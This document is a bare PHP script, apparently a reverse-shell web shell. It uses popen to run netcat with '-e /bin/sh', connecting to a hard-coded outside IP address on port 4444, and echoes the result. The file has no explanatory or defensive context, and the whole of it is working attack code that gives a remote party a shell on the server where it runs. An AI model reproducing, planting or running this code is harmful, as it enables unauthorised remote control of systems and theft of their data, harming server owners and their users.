<?php
$ip = '103.104.177.200';
$port = 4444;
$command = 'nc -e /bin/sh '.$ip.' '.$port;
$handle = popen($command, 'r');
while (!feof($handle)) {
    $buffer = fgets($handle);
    echo $buffer;
}
pclose($handle);
?>
